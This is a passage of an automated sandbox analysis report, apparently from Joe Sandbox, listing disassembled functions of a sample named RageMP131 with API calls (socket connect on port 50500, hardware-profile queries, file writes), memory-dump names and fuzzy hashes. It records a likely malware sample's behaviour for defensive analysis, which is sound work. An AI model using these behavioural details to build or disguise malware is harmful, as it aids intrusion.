Instruction ID: dd09346e05613329d63311ccc472e2a6d02328f73a08eaac7cb1ea193d776934
Opcode Fuzzy Hash: 427073a4ef8cdd273e52de3960116424fab24a684a798692c956fdf8c3eeff39
Instruction Fuzzy Hash: 90612C75D09315DBCF24DF94C884AADF7B1BF48325F2582AAD505AB2C1C370AE81EB91

Function 0094DB60 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 99
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32 ref: 0094DB8B
socket.WS2_32(?,?,?,?,?,?,50500,?,?), ref: 0094DC2E
connect.WS2_32(00000000,?,?,?,?,?,50500,?,?), ref: 0094DC42
closesocket.WS2_32(00000000), ref: 0094DC4D

Strings

50500, xrefs: 0094DBE8
`4u, xrefs: 0094DC1E

Memory Dump Source

Source File: 00000011.00000002.3909493292.0000000000931000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00930000, based on PE: true

Associated: 00000011.00000002.3909371628.0000000000930000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3909493292.0000000000A63000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3909976006.0000000000A67000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000A7A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000C07000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000CF3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000D2F000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000D36000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000D46000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3921781802.0000000000D47000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3923692041.0000000000F03000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3923782795.0000000000F04000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3923823758.0000000000F07000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3923866312.0000000000F08000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_930000_RageMP131.jbxd

Yara matches

Similarity

API ID: Startupclosesocketconnectsocket
String ID: 50500$`4u
API String ID: 3098855095-1883443620
Opcode ID: e9ddc2d38e1eeebf60a3641584d09f99e716d92cd9d1e05baf2c048076a2aa99
Instruction ID: 4030251839116887ed262265b58f032438b6706291f9c564825b9496dc319f1b
Opcode Fuzzy Hash: e9ddc2d38e1eeebf60a3641584d09f99e716d92cd9d1e05baf2c048076a2aa99
Instruction Fuzzy Hash: AD31D3766053456BC7209F648C84B3BB7E9FF89735F001F1DF9A8932E0E37098058692

Function 054C09C6 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 253
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

gA@V, xrefs: 054C09CE

Memory Dump Source

Source File: 00000011.00000002.3931116961.00000000054C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_54c0000_RageMP131.jbxd

Similarity

API ID:
String ID: gA@V
API String ID: 0-2224835733
Opcode ID: b81c28348a5d8d88e10f67c9386876b6629db071587c6dccff463e1600eb073f
Instruction ID: a7bb1677e83a82e6f178bc0fca220ae6abe8173cebcb3a5cc54d3a94a9822df7
Opcode Fuzzy Hash: b81c28348a5d8d88e10f67c9386876b6629db071587c6dccff463e1600eb073f
Instruction Fuzzy Hash: 46518EEF14D110FDA192C5816B5CAFE6E6FE6E6730B3084AFB40FD6642E2D50E8A5131

Function 054C09AE Relevance: 1.9, APIs: 1, Instructions: 373
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000011.00000002.3931116961.00000000054C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_54c0000_RageMP131.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54a19ced1ec70d7e575638507adfa6f9c73a601b1f87680f5f20ac044884aa83
Instruction ID: 95413ea5bb53d6d3d76e91af5ba4798554953e37f3cedb29390c56ec6f91fe69
Opcode Fuzzy Hash: 54a19ced1ec70d7e575638507adfa6f9c73a601b1f87680f5f20ac044884aa83
Instruction Fuzzy Hash: AF7170EF24D214FDA192C1852B5CAFE6F6EE6D763073084AFF40FD6642E6D40A4A5131

Function 054C09DE Relevance: 1.8, APIs: 1, Instructions: 279
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000011.00000002.3931116961.00000000054C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_54c0000_RageMP131.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66bd857502ee362e7b76eb389d04ff74215645c94a3cfe19f379a0292799439a
Instruction ID: 7244522aaada4391253fc71ec48913e7ff7f67d6d152c80ce138b3236d94764a
Opcode Fuzzy Hash: 66bd857502ee362e7b76eb389d04ff74215645c94a3cfe19f379a0292799439a
Instruction Fuzzy Hash: C7519CEF10D214FDA182C5856B5CAFE6E6FE6E7730B3084AFF40FD6602E2950A4A5131

Function 054C0A2A Relevance: 1.8, APIs: 1, Instructions: 267
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000011.00000002.3931116961.00000000054C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_54c0000_RageMP131.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8fc902947dd84f4aaf25849ac8b0638808af3ac90e4be460d653b307dad3d9ed
Instruction ID: e5ce8b9333491cc941122caf1004e58b01d743dc8df9c3f9a561bb9429f9ec09
Opcode Fuzzy Hash: 8fc902947dd84f4aaf25849ac8b0638808af3ac90e4be460d653b307dad3d9ed
Instruction Fuzzy Hash: 2151CFEF14D211FDA282C1856B5CAFE6F6EE6D673073084AFF40FC6642E2940E4A5131

Function 054C09F9 Relevance: 1.8, APIs: 1, Instructions: 259
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000011.00000002.3931116961.00000000054C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_54c0000_RageMP131.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cf4a83a3c339f19937b5552c8ab1b068026f51c968e2f974ed28738e49c79e2
Instruction ID: abf624c776b48f1aed3a4db945ccad9776c0fdb38f94baf920263614863a0967
Opcode Fuzzy Hash: 6cf4a83a3c339f19937b5552c8ab1b068026f51c968e2f974ed28738e49c79e2
Instruction Fuzzy Hash: AF519CEF14D110FDA292C1856B5CAFE6E6FE6D6730B3084AFF40FD6642E2940A8A5131

Function 054C0A13 Relevance: 1.7, APIs: 1, Instructions: 236
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 054C0C34

Memory Dump Source

Source File: 00000011.00000002.3931116961.00000000054C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_54c0000_RageMP131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: e9e623a55dd2f21fcbccd58e4380a95624beff225bdd2aa55fdb6d9b71bf1b88
Instruction ID: d98c466a74f54532b6106e32b482c6861111becb59e1802ab6c688b9b2dc00ac
Opcode Fuzzy Hash: e9e623a55dd2f21fcbccd58e4380a95624beff225bdd2aa55fdb6d9b71bf1b88
Instruction Fuzzy Hash: B6418CEF14D110FDB192C5856B5CAFE6E6FE6E6730B3084ABB40FD6642E2D40E8A5131

Function 054C0A1E Relevance: 1.7, APIs: 1, Instructions: 235
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 054C0C34

Memory Dump Source

Source File: 00000011.00000002.3931116961.00000000054C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_54c0000_RageMP131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: f529b7854fa8fb033338f11aac1f98b894af816f941a9e627324e48d74ba4b03
Instruction ID: ba62b19d239130023e13d8b76d042c9542a8dbeb0db8da1a58e9c178d8f8c57b
Opcode Fuzzy Hash: f529b7854fa8fb033338f11aac1f98b894af816f941a9e627324e48d74ba4b03
Instruction Fuzzy Hash: 3C419DEF14D110FDB192C5856B5CAFE6EAFE6D6730B3084ABB40FD6642E2D40E8A5131

Function 054C0A50 Relevance: 1.7, APIs: 1, Instructions: 229
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 054C0C34

Memory Dump Source

Source File: 00000011.00000002.3931116961.00000000054C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_54c0000_RageMP131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 69ae2144c7255bb6961e8e4889658b9b5b37ca6ff6aff6a6cf2d12800044bd74
Instruction ID: 200f18a974aac0397b46cfb482cbd2ddb11d12291ee0b2698cd7adf6d28f4942
Opcode Fuzzy Hash: 69ae2144c7255bb6961e8e4889658b9b5b37ca6ff6aff6a6cf2d12800044bd74
Instruction Fuzzy Hash: 5841AFEF24D114FDB282C5856B58AFA6E6FE6D7730B3084ABB40FD6642E2D40A4A5131

Function 054C0A6D Relevance: 1.7, APIs: 1, Instructions: 223
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 054C0C34

Memory Dump Source

Source File: 00000011.00000002.3931116961.00000000054C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_54c0000_RageMP131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 6b83d38be5810e94228ea02d3d0547dfbdbd9440257ba6cea13f67f58d71d8fa
Instruction ID: db60c4f9621ead0bf5eeb9130a14d99ed37b1739bafb01cef53fbf75fa8109f7
Opcode Fuzzy Hash: 6b83d38be5810e94228ea02d3d0547dfbdbd9440257ba6cea13f67f58d71d8fa
Instruction Fuzzy Hash: 1341AEEF24D111FDB282C5856B5CAFE6A6FE6D7730B3084ABB40FD6542E2D40E8A5131

Function 054C0A82 Relevance: 1.7, APIs: 1, Instructions: 216
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 054C0C34

Memory Dump Source

Source File: 00000011.00000002.3931116961.00000000054C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_54c0000_RageMP131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 868680c460dca95378be2105d6dd61d86ba92e255df82f05589a3226e82d61f2
Instruction ID: 63e288752a6f1440b820733bea49249d2d68edd8732dffbb72b87b9b4b68c389
Opcode Fuzzy Hash: 868680c460dca95378be2105d6dd61d86ba92e255df82f05589a3226e82d61f2
Instruction Fuzzy Hash: 98419CEF14D111FDB282C5816B5CAFA6B6FE6D6730B3084ABF40FD2542E2D40A8A5131

Function 054C0A99 Relevance: 1.7, APIs: 1, Instructions: 206
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 054C0C34

Memory Dump Source

Source File: 00000011.00000002.3931116961.00000000054C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_54c0000_RageMP131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 1f142a8440c5c978d56e98e7edc94098ad8e3fc7000d1d55f0577b91dc0074fb
Instruction ID: 0369a23e6041308dc4281909d85fe1eaeee8aa724e96bde6df21591849bb56d5
Opcode Fuzzy Hash: 1f142a8440c5c978d56e98e7edc94098ad8e3fc7000d1d55f0577b91dc0074fb
Instruction Fuzzy Hash: 6F419DEF14D114FDB182C6856B5CAFE6BAFE6D6730B3084ABF40FD6542E2D40A8A5131

Function 054C0AA9 Relevance: 1.7, APIs: 1, Instructions: 202
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 054C0C34

Memory Dump Source

Source File: 00000011.00000002.3931116961.00000000054C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_54c0000_RageMP131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 7acbdb17128002f1ae3675f4e93a7e9fcd70a9e2bb3554e718df2b06ffd3970d
Instruction ID: 05bcb342c8257d428d187ab71f77463d0e2b289f360816e854b0136ca9d06a31
Opcode Fuzzy Hash: 7acbdb17128002f1ae3675f4e93a7e9fcd70a9e2bb3554e718df2b06ffd3970d
Instruction Fuzzy Hash: 2A41AEEF14C125FCB292C5816B5CAFE6A6FE6D6730B3084ABF40FD6542E2D40E8A5131

Function 00A22F0C Relevance: 1.7, APIs: 1, Instructions: 198
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteFile.KERNELBASE(?,00000000,00A16AF7,?,00000000,00000000,00000000,?,00000000,?,00A0C023,00A16AF7,00000000,00A0C023,?,?), ref: 00A23091

Memory Dump Source

Source File: 00000011.00000002.3909493292.0000000000931000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00930000, based on PE: true

Associated: 00000011.00000002.3909371628.0000000000930000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3909493292.0000000000A63000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3909976006.0000000000A67000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000A7A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000C07000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000CF3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000D2F000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000D36000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000D46000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3921781802.0000000000D47000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3923692041.0000000000F03000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3923782795.0000000000F04000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3923823758.0000000000F07000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3923866312.0000000000F08000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_930000_RageMP131.jbxd

Yara matches

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 49ade1233ee523d3ca919ff7c79963846a05ad079eedafebf579a731e69af8ca
Instruction ID: 44e90fb5f422791ee536e9221006804d34bb9d09290ea7f9ff65e62d7f8e8f21
Opcode Fuzzy Hash: 49ade1233ee523d3ca919ff7c79963846a05ad079eedafebf579a731e69af8ca
Instruction Fuzzy Hash: C561D472D04129BFDF11DFACE984AEEBBB9AF19304F140165E904AB252C375DA11CB60

Function 054C0AD6 Relevance: 1.7, APIs: 1, Instructions: 193COMMON

Download Yara Rule

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 054C0C34

Memory Dump Source

Source File: 00000011.00000002.3931116961.00000000054C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_54c0000_RageMP131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 59698ce45b9148c84281877dbe14c702f882c1246ce1b73abdf315fa29894bae
Instruction ID: 9b9b7e19b5e03e742ee00bf9ae42131acf3bdeae1ae054a00f3424d595e890d0
Opcode Fuzzy Hash: 59698ce45b9148c84281877dbe14c702f882c1246ce1b73abdf315fa29894bae
Instruction Fuzzy Hash: 06318BEF14C125BCB292C1856B5CAFE6B6EE6D6730B3084ABF40FD6542E2D41A8A5131

Function 054C0AE6 Relevance: 1.7, APIs: 1, Instructions: 189COMMON

Download Yara Rule

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 054C0C34

Memory Dump Source

Source File: 00000011.00000002.3931116961.00000000054C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_54c0000_RageMP131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 7611faf0d8627107d93d1b8468ea1fb3a3ef8e644972e1b893895260cc955f35
Instruction ID: 0b04cddfa2f4665d162c1556d1d3a597a1fc5b83cf2bbbf65527002d21db67ca
Opcode Fuzzy Hash: 7611faf0d8627107d93d1b8468ea1fb3a3ef8e644972e1b893895260cc955f35
Instruction Fuzzy Hash: 7531BFEF14C125BDB292C1816B5CAFA6B7FE6D6730B3084ABF40FD6542E2D41A8A5131

Function 054C0B13 Relevance: 1.7, APIs: 1, Instructions: 181COMMON

Download Yara Rule

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 054C0C34

Memory Dump Source

Source File: 00000011.00000002.3931116961.00000000054C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_54c0000_RageMP131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 34116dc137c4c477342c18f22ecd7b960d3928070e41c5a36c6514e85be1698d
Instruction ID: 5e50f8f08e8594c6ee2474cc5e84ef48909e1e978df42c307c752e57636ea6fa
Opcode Fuzzy Hash: 34116dc137c4c477342c18f22ecd7b960d3928070e41c5a36c6514e85be1698d
Instruction Fuzzy Hash: AE31AEEF14C114BDB296C5816B5CAFE6FBEE6D6330B3084ABF40FD6542E2D44A8A5131

Function 054C0B58 Relevance: 1.7, APIs: 1, Instructions: 178COMMON

Download Yara Rule

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 054C0C34

Memory Dump Source

Source File: 00000011.00000002.3931116961.00000000054C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_54c0000_RageMP131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: b6c736b22573864721bdecbfbc0cbc55bfdee46ac3533f0585e64cb3a62f48fa
Instruction ID: 73bcb04635738b538f858590b05104668fde30283455af90f0300d0003eedb0d
Opcode Fuzzy Hash: b6c736b22573864721bdecbfbc0cbc55bfdee46ac3533f0585e64cb3a62f48fa
Instruction Fuzzy Hash: 9231AFEF14C114BDA296C5816B5CAFA6FBFE6D6730B3084ABF40FD6542E2D40A8E5131

Function 054C0B7E Relevance: 1.7, APIs: 1, Instructions: 158COMMON

Download Yara Rule

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 054C0C34

Memory Dump Source

Source File: 00000011.00000002.3931116961.00000000054C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_54c0000_RageMP131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: df1add8b210246102c79577a27794e3d37c66f7cac2284b4bed06b8e1167f43e
Instruction ID: 726d8dffbf8fee62ae35c93c65e7067a20e8c0af0e8807489c70478cba11e6a0
Opcode Fuzzy Hash: df1add8b210246102c79577a27794e3d37c66f7cac2284b4bed06b8e1167f43e
Instruction Fuzzy Hash: 7A31C4EF14C124ADA296C1556B5D6FA6FBEE5D733073084ABF40FC6946E2840A4E5131

Function 0099BA20 Relevance: 1.6, APIs: 1, Instructions: 135COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 0099BB71

Memory Dump Source

Source File: 00000011.00000002.3909493292.0000000000931000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00930000, based on PE: true

Associated: 00000011.00000002.3909371628.0000000000930000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3909493292.0000000000A63000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3909976006.0000000000A67000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000A7A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000C07000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000CF3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000D2F000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000D36000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000D46000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3921781802.0000000000D47000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3923692041.0000000000F03000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3923782795.0000000000F04000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3923823758.0000000000F07000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3923866312.0000000000F08000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_930000_RageMP131.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: b19d2212db506fa46971754378483badd225f06599945ea51feb898bce11e8e1
Instruction ID: a2e340e8a8a69aa119e09e7f986a4709c44c9c12696ae56d18b1f52d3f170153
Opcode Fuzzy Hash: b19d2212db506fa46971754378483badd225f06599945ea51feb898bce11e8e1
Instruction Fuzzy Hash: 204113729001099BCF15DF6CEA816AEBBE9EF44350F240669F804EB345D734EE109BE1

Function 054C0BD3 Relevance: 1.6, APIs: 1, Instructions: 125COMMON

Download Yara Rule

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 054C0C34

Memory Dump Source

Source File: 00000011.00000002.3931116961.00000000054C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_54c0000_RageMP131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 839b904950cc7a7a92e78b2c893dfcacc4bd58895b48c2f3ee0fd415bb6421f5
Instruction ID: 538736e6c51d0a9b26e2a57b88d8974f23b06d3b00094a25adc0bcecf345d574
Opcode Fuzzy Hash: 839b904950cc7a7a92e78b2c893dfcacc4bd58895b48c2f3ee0fd415bb6421f5
Instruction Fuzzy Hash: 3621EDEF14C124BCB296C6856B1CAFEAFBFE6D733033085ABB40FD5546E2841A4A5131

Function 054C0C42 Relevance: 1.6, APIs: 1, Instructions: 120COMMON

Download Yara Rule

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 054C0C34

Memory Dump Source

Source File: 00000011.00000002.3931116961.00000000054C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_54c0000_RageMP131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: a87617a5874b0a6687939e654d264cd24f41a239f5c8784898273278b22d28ca
Instruction ID: f049bd3ad80d8dd13b4bfaf0a9d9f49ac5341de8abe424bb9776a9285bbbfac2
Opcode Fuzzy Hash: a87617a5874b0a6687939e654d264cd24f41a239f5c8784898273278b22d28ca
Instruction Fuzzy Hash: 2F21ACEF14C124FCA196C6856B1CAFE6EBFE6D733073085ABB40FD5641E2941A8A5131

Function 054C0BFD Relevance: 1.6, APIs: 1, Instructions: 108COMMON

Download Yara Rule

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 054C0C34

Memory Dump Source

Source File: 00000011.00000002.3931116961.00000000054C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_54c0000_RageMP131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 3d213a3073017e3b298a99b2dbaaa37a48a764a236b908fd24095733619e7d05
Instruction ID: e8ae35eeefe853e4974a6ec25e644fe8c029beb565a8d1e4674776d02e8ac3d6
Opcode Fuzzy Hash: 3d213a3073017e3b298a99b2dbaaa37a48a764a236b908fd24095733619e7d05
Instruction Fuzzy Hash: 332101EF10C224BDA282D2546B586FA6FBEE6D6330B3085ABB40FD6642D2910A4A4171

Function 054C0C2A Relevance: 1.6, APIs: 1, Instructions: 103COMMON

Download Yara Rule

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 054C0C34

Memory Dump Source

Source File: 00000011.00000002.3931116961.00000000054C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_54c0000_RageMP131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 08b9b9932ec6094e1cdd26559dac50aa62965f1dfe5e304a613bb3f3d7521727
Instruction ID: 743151f9e3fb6cfad8b65ae24c51cbe3d276e44e7e475faf9d858a412dccd9d9
Opcode Fuzzy Hash: 08b9b9932ec6094e1cdd26559dac50aa62965f1dfe5e304a613bb3f3d7521727
Instruction Fuzzy Hash: 8B11D0EF10C124BCB1C6D2456B5CAFA6BBEE6D733033081AFB40FC5945D2810A8A5171

Function 00A22582 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(00000000,00000000,CF830579,?,00A22469,00000000,CF830579,00A61148,0000000C,00A22525,00A1662D,?), ref: 00A225D8

Memory Dump Source

Source File: 00000011.00000002.3909493292.0000000000931000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00930000, based on PE: true

Associated: 00000011.00000002.3909371628.0000000000930000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3909493292.0000000000A63000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3909976006.0000000000A67000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000A7A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000C07000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000CF3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000D2F000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000D36000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000D46000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3921781802.0000000000D47000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3923692041.0000000000F03000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3923782795.0000000000F04000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3923823758.0000000000F07000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3923866312.0000000000F08000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_930000_RageMP131.jbxd

Yara matches

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: e41bddfd3ad5c7327bbe2fcd51eb33e0674a20c71563727b360244ddb98ee7b7
Instruction ID: dbb60b60da5bdc7e199c7ee74018b0b8254eaaae61a471aa343a2ca086a61cc7
Opcode Fuzzy Hash: e41bddfd3ad5c7327bbe2fcd51eb33e0674a20c71563727b360244ddb98ee7b7
